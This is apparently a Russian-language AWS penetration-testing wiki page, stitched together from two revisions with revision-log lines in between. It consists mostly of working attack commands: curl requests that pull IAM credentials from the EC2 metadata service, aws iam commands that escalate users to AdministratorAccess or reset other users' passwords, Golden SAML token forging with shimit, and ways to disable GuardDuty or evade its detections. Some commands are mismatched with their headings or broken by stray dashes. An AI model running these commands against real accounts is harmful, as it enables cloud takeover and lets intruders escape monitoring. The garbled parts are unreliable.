<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[Файл:Product-Page-Diagram A2I.png| 500px]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Файл:Product-Page-Diagram A2I.png

2022-10-17T10:46:34Z

Drakylar:

Aws

2022-10-12T21:06:24Z

Drakylar: /* Роли - повышение привилегий */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

